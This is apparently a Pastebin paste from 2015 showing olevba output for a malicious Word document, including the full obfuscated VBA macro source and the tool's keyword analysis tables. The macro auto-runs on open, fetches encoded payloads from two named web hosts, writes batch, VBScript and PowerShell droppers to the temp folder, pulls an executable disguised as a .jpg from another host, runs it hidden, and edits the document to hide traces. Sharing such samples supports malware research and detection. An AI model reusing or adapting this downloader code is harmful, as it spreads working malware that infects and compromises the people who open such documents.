dynamoo

Malicious Word macro

Jul 21st, 2015
750
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- edcsrp~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: edcsrp~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16.  Sub ZJhcjkhjwqhdjqw_Open()
  17.      
  18. End Sub
  19. Sub Huqwhdkqwhdjkqw_Open()
  20.      
  21. End Sub
  22. Sub Auto_Open()
  23.     Zjdihquhwqid
  24. End Sub
  25. Sub Zjdihquhwqid()
  26.     HYQDUGWQ = "nj21he jg2hj21ge"
  27.     Ynqhbdjhqwb
  28. End Sub
  29. Sub Giqjwdhqwkjq()
  30.     BHBDJHWQ = "behj21ghj12"
  31. End Sub
  32. Sub AutoOpen()
  33.     JAHSDJGHQW = "jr3 2jhjk2gr2"
  34.     Zjdihquhwqid
  35. End Sub
  36.  
  37. Sub Workbook_Open()
  38.     LJKLJWDKLQ = "bhjgwqhjdgqj "
  39.     Auto_Open
  40. End Sub
  41.  
  42. Sub Ynqhbdjhqwb()
  43.  
  44.    
  45.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
  46.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
  47.     BOLIVIA = Chr(90 + 2)
  48.    
  49.    
  50.     ANGOLA = Ubqhwdhwqbd(16137) + ""
  51.     SPAIN = Chr(84) & "em" + "p"
  52.     QHDQUWH = ANGOLA
  53.     FL2 = QHDQUWH
  54.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
  55.    
  56.     silkroad = 9
  57.     jwnqdw = -1
  58.    
  59.     BOSNIA = 8719723
  60.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
  61.     BALAGAN = BOSNIA
  62.    
  63.  
  64.     JWIDJIAAA = ""
  65.     QIWJDABB = "b"
  66.     HUYFEA = QIWJDABB + "a" + "t"
  67.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
  68.    
  69.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
  70.     SSS = Chr(BALAGAN + 2 + gana)
  71.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
  72.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
  73.    
  74.     INTG = "" & "o" & "bject"
  75.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
  76.     AFTG = Chr(109) & KIWD
  77.    
  78.     SXEE = Chr(46)
  79.     SXAA = Chr(101)
  80.     SXE = SXEE & SXAA & "" & "xe"
  81.     GNG = Chr(2 ^ 2 + 42) + "jpg"
  82.    
  83.    
  84.    
  85.     HUQD = Chr(30 + 16 + 1)
  86.     ATTH = "ht" & "t" & "" & "p" & ":" & "//"
  87.     BQHJDQ = "sa" + "vep" + "ic" & Chr(46) & "su" + HUQD
  88.      
  89.     PSPTH = PH2 + PSFL
  90.     VBPTH = PH2 + VBFL
  91.     BAPTH = "1jh2ekh12kehk12he j12g e21"
  92.     ABPTH = PH2 + BAFL
  93.     BAPTH = ABPTH
  94.     JHQKWDQAASS = BQHJDQ
  95.    
  96.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
  97.    
  98.     DRT = 315
  99.     BFT = 316
  100.     CFT = 317
  101.     DFT = 318
  102.     EFT = 319
  103.     Dim NUWDHUQHUQWDH As String
  104.     NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
  105.     Dim PBIn As String, asdwq As String, MIWDWQ As String
  106.    
  107.    
  108.    
  109.     TSTS = "." + "tx" + "t"
  110.     CDDD = "78672738612836" + TSTS
  111.     LNSS = "f" & "a" & "f" & "a" & "" + TSTS
  112.     STT1 = "phudge.ca/w" + "ordp" + "ress/w" + "p-con" + "tent/themes/can" + "vas/inc" + "ludes/.svn/props/"
  113.     STT2 = "kedros.ch/mod" + "ules/m" + "od_ara" + "ticlhess/"
  114.  
  115.  
  116.     PBIn = ATTH + STT1 + CDDD
  117.     CONT = Module2.Linolium(PBIn)
  118.      
  119.     asdwq = Rasdas(CONT)
  120.    
  121.     HQUWDAAA = "0"
  122.     If (asdwq <> "=") Then
  123.         PBIn = ATTH + STT2 + CDDD
  124.         CONT = Module2.Linolium(PBIn)
  125.         asdwq = CONT
  126.         HQUWDAAA = "1"
  127.     End If
  128.    
  129.     CONT = Quqhwdbyas(asdwq)
  130.      
  131.     Dim ahuywdgqy As String
  132.      
  133.     TVT10 = Port(CONT, "t" & "ext10")
  134.     TVT20 = Port(CONT, "t" & "ext20")
  135.     TVT21 = Port(CONT, "t" & "ext21")
  136.     TVT30 = Port(CONT, "t" & "ext30")
  137.     TVT31 = Port(CONT, "t" & "ext31")
  138.     XPT1 = Port(CONT, "stext1")
  139.     XPT2 = Port(CONT, "stext2")
  140.     XPT3 = Port(CONT, "stext3")
  141.    
  142.    
  143.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
  144.     hufehu1 = InStr(WVR, "sers\")
  145.    
  146.     Dim hudhw As Integer
  147.     Dim ghdAdd(1 To 3)
  148.     ghdAdd(1) = "1"
  149.     ghdAdd(2) = "0"
  150.     ghdAdd(3) = "0"
  151.    
  152.     If (hufehu1 <> 0) Then
  153.         ghdAdd(1) = "2"
  154.     Else
  155.         ghdAdd(2) = "3"
  156.     End If
  157.  
  158.  
  159.     JHWQUD = Join(ghdAdd)
  160.     hudhw = Val(JHWQUD)
  161.    
  162.     Module2.Crispy (1)
  163.    
  164.     MIWDWQ = ATTH + STT1 + LNSS
  165.     If (HQUWDAAA = "1") Then
  166.         MIWDWQ = ATTH + STT2 + LNSS
  167.     End If
  168.    
  169.     SEXX = Module2.Linolium(MIWDWQ)
  170.    
  171.     PSTB = PBIn + "123123123"
  172.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
  173.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
  174.     STAR1 = ATTH + MSTAR1
  175.     STAR2 = ATTH + MSTAR2
  176.     FFQ = "8"
  177.     FF = FFQ + SXE
  178.    
  179.      If (hudhw = 130) Then
  180.      Open BAPTH For Output As #DRT
  181.      Print #DRT, XPT1
  182.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
  183.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  184.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  185.      Print #DRT, XPT2
  186.      Close #DRT
  187.      
  188.      Module2.Crispy (1)
  189.      
  190.      Open VBPTH For Output As #BFT
  191.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  192.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  193.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  194.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  195.      Print #BFT, XPT3
  196.      Close #BFT
  197.      
  198.      BDDT.Crispy (1)
  199.      NTH1 = Module3.HowEver(retVal, BAPTH)
  200.      
  201.      End If
  202.      
  203.      
  204.      HUDQG = "';"
  205.      
  206.      
  207.      
  208.       If (hudhw = 200) Then
  209.        
  210.      ZPQSKD = FL2
  211.      Open PSPTH For Output As #CFT
  212.      Print #CFT, "$bhjdgqwdg = 'qbwdjhqbwgd';"
  213.      Print #CFT, "$bqhdwjqwdd = 'njqdhjqwdqj';"
  214.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
  215.      Print #CFT, "$ggtt = '" + SEXX + "';"
  216.      Print #CFT, "$pths = '" + PH2 + HUDQG
  217.      
  218.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
  219.      Print #CFT, "$nnm = '" + FFQ + "';"
  220.      Print #CFT, TVT10
  221.      Close #CFT
  222.      
  223.      Open VBPTH For Output As #DFT
  224.      Print #DFT, TVT30
  225.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
  226.      Print #DFT, TVT31
  227.      Close #DFT
  228.    
  229.      Open BAPTH For Output As #EFT
  230.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
  231.      Print #EFT, TVT20
  232.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  233.      Print #EFT, ":hdjqkwhdqhwd"
  234.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
  235.      Print #EFT, ":ajhsdkasghjgsd"
  236.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
  237.      Print #EFT, TVT21
  238.      Close #EFT
  239.      Module2.Crispy (1)
  240.      
  241.      NTH2 = Module3.HowEver(retVal, BAPTH)
  242.      
  243.      End If
  244.      
  245.     JUW = Chr(47)
  246.     AKK = Chr(60)
  247.     ZKK = ">"
  248.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  249.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  250.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
  251.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
  252.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
  253.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
  254.    
  255. End Sub
  256.  
  257.  
  258. Public Function NUqwdqwbdsad(a As Integer)
  259. NUqwdqwbdsad = Sgn(a)
  260. End Function
  261.  
  262. Public Function Hhqudhqwgyuqwaaa(a As Integer)
  263. Hhqudhqwgyuqwaaa = Sgn(a)
  264. End Function
  265.  
  266. Public Function Ubqhwdhwqbd(a As Integer)
  267. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
  268. End Function
  269.  
  270.  
  271. Public Function Quqhwdbyas(ByVal strData As String) As String
  272.     Dim objXML As Object
  273.     Dim objNode As Object
  274.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
  275.     nudqwd = Tan(12)
  276.     'MsgBox ("tangens:" + nudqwd)
  277.    asduiwhqdqiw = Hhqudhqwgyuqwaaa(nudqwd)
  278.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
  279.     Set objXML = CreateObject(QHDHUQW)
  280.     Set objNode = objXML.createElement("b6" + "4")
  281.     objNodeS = "j1h2 ehgj12hj12 ejg12e1"
  282.     objNodeE = "g21eh1"
  283.     objNodeQ = "1j2ge h12"
  284.     objNodeZ = "dbjsahs "
  285.     objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
  286.     objNode.Text = strData
  287.     WUDHA = objNode.nodeTypedValue
  288.     Quqhwdbyas = WUDHA
  289.     Set objNode = Nothing
  290.     Set objXML = Nothing
  291. End Function
  292.  
  293. Public Function Port(a, b As String)
  294. Dim krd, tent As Integer
  295. UQWD = Chr(50 + 8 + 2) & ""
  296. NDUW = "" & Chr(70 - 8)
  297. krd = InStr(1, a, UQWD + b + NDUW) + 8
  298. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
  299. KLMN = Mid$(a, krd, tent)
  300. HUQHWDA = KLMN
  301. Port = HUQHWDA
  302. End Function
  303.  
  304.  
  305.  
  306. Private Static Function Rasdas(a As String)
  307. Rasdas = Right(a, 1)
  308. End Function
  309.  
  310.  
  311.  
  312.  
  313.  
  314.  
  315. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  316. ANALYSIS:
  317. +------------+----------------+-----------------------------------------+
  318. | Type       | Keyword        | Description                             |
  319. +------------+----------------+-----------------------------------------+
  320. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
  321. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
  322. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
  323. | Suspicious | CreateObject   | May create an OLE object                |
  324. | Suspicious | Open           | May open a file                         |
  325. | Suspicious | Output         | May write to a file (if combined with   |
  326. |            |                | Open)                                   |
  327. | Suspicious | Print #        | May write to a file (if combined with   |
  328. |            |                | Open)                                   |
  329. | Suspicious | Chr            | May attempt to obfuscate specific       |
  330. |            |                | strings                                 |
  331. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  332. |            |                | be used to obfuscate strings (option    |
  333. |            |                | --decode to see all)                    |
  334. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  335. |            |                | may be used to obfuscate strings        |
  336. |            |                | (option --decode to see all)            |
  337. +------------+----------------+-----------------------------------------+
  338. -------------------------------------------------------------------------------
  339. VBA MACRO Module1.bas
  340. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module1'
  341. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  342. Public Function Xjdkhjfwefw(a As Object)
  343. Xjdkhjfwefw = (a.responseText)
  344. End Function
  345.  
  346.  
  347. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  348. ANALYSIS:
  349. No suspicious keyword or IOC found.
  350. -------------------------------------------------------------------------------
  351. VBA MACRO Module2.bas
  352. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module2'
  353. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  354.  
  355. Public Function Goabc(sps As String)
  356. NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
  357. NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
  358. NJBHVGASVD = "h1j2 hjeg1hj12geh 1221ek l12j12e"
  359. Goabc = Environ(sps)
  360. End Function
  361. Public Function Linolium(nbqjbdjqw As String)
  362. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
  363. Dim ashdUHhda As String, hausd As Integer
  364. ashdUHhda = nbqjbdjqw
  365. hausd = Tan(12)
  366. BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
  367. 'MsgBox (BQDHJQWDGWQJGS)
  368. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
  369. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
  370. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
  371. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
  372. End Function
  373. Sub Crispy(NumOfSeconds As Long)
  374. Dim SngSec As Long
  375. SngSec = Timer + NumOfSeconds
  376. Do While Timer < SngSec
  377. DoEvents
  378. Loop
  379. End Sub
  380.  
  381.  
  382.  
  383.  
  384.  
  385. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  386. ANALYSIS:
  387. +------------+--------------+-----------------------------------------+
  388. | Type       | Keyword      | Description                             |
  389. +------------+--------------+-----------------------------------------+
  390. | Suspicious | CreateObject | May create an OLE object                |
  391. | Suspicious | Open         | May open a file                         |
  392. | Suspicious | Environ      | May read system environment variables   |
  393. | Suspicious | Chr          | May attempt to obfuscate specific       |
  394. |            |              | strings                                 |
  395. +------------+--------------+-----------------------------------------+
  396. -------------------------------------------------------------------------------
  397. VBA MACRO Module3.bas
  398. in file: edcsrp~1.doc - OLE stream: u'Macros/VBA/Module3'
  399. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  400.  
  401. Public Function India(dnuwhd As String, b As String, c As Integer)
  402. Dim selectedText As String
  403. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
  404. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
  405. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  406. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  407. With ssjidoqwhduqhwidqwudihq.Find
  408. 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  409. 'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  410. .Text = dnuwhd
  411. .MatchWholeWord = True
  412. ssjidoqwhduqhwidqwudihq.Find.Execute
  413. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
  414. Dim wdwq As String
  415. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
  416. Dim wdsadwq As String
  417. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
  418. .Text = b
  419. .MatchWholeWord = True
  420. .Execute
  421. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  422. BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  423. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
  424. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
  425.  
  426. If (c = 1) Then
  427.     selectedText = lesleslesqjhdjqkwhdwq.Delete
  428. End If
  429. If (c = 2) Then
  430.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
  431. End If
  432.  
  433. Dim hduwaa As Integer
  434. hduwaa = 1 - 2 ^ 4
  435.  
  436. QHUDW = Chr(10 + 23 + Sgn(hduwaa))
  437.  
  438. If (c = 3) Then
  439.     With ssjidoqwhduqhwidqwudihq.Find
  440.     .Text = a
  441.     .Replacement.Text = QHUDW
  442.     'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  443.    'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  444.    'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  445.    'BYHQGDJHWQ = "KH21E JK12GJFHE G21HFEGH12F fghf eghewf jhg hjsgfhjghj3g j12"
  446.    .Wrap = wdFindContinue
  447.     .Execute Replace:=wdReplaceAll
  448.     End With
  449. End If
  450.  
  451. End With
  452. End Function
  453.  
  454. Public Function HowEver(hqwdugqw As Variant, hasdgja)
  455. BHQJGDWQ = "1b2hej g1h2e21j"
  456. hqwdugqw = Shell(hasdgja, 0)
  457. HowEver = hqwdugqw
  458. End Function
  459.  
  460.  
  461.  
  462.  
  463.  
  464.  
  465.  
  466.  
  467.  
  468.  
  469.  
  470.  
  471.  
  472.  
  473.  
  474.  
  475.  
  476. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  477. ANALYSIS:
  478. +------------+---------+-----------------------------------------+
  479. | Type       | Keyword | Description                             |
  480. +------------+---------+-----------------------------------------+
  481. | Suspicious | Shell   | May run an executable file or a system  |
  482. |            |         | command                                 |
  483. | Suspicious | Chr     | May attempt to obfuscate specific       |
  484. |            |         | strings                                 |
  485. +------------+---------+-----------------------------------------+
Add Comment
Please, Sign In to add comment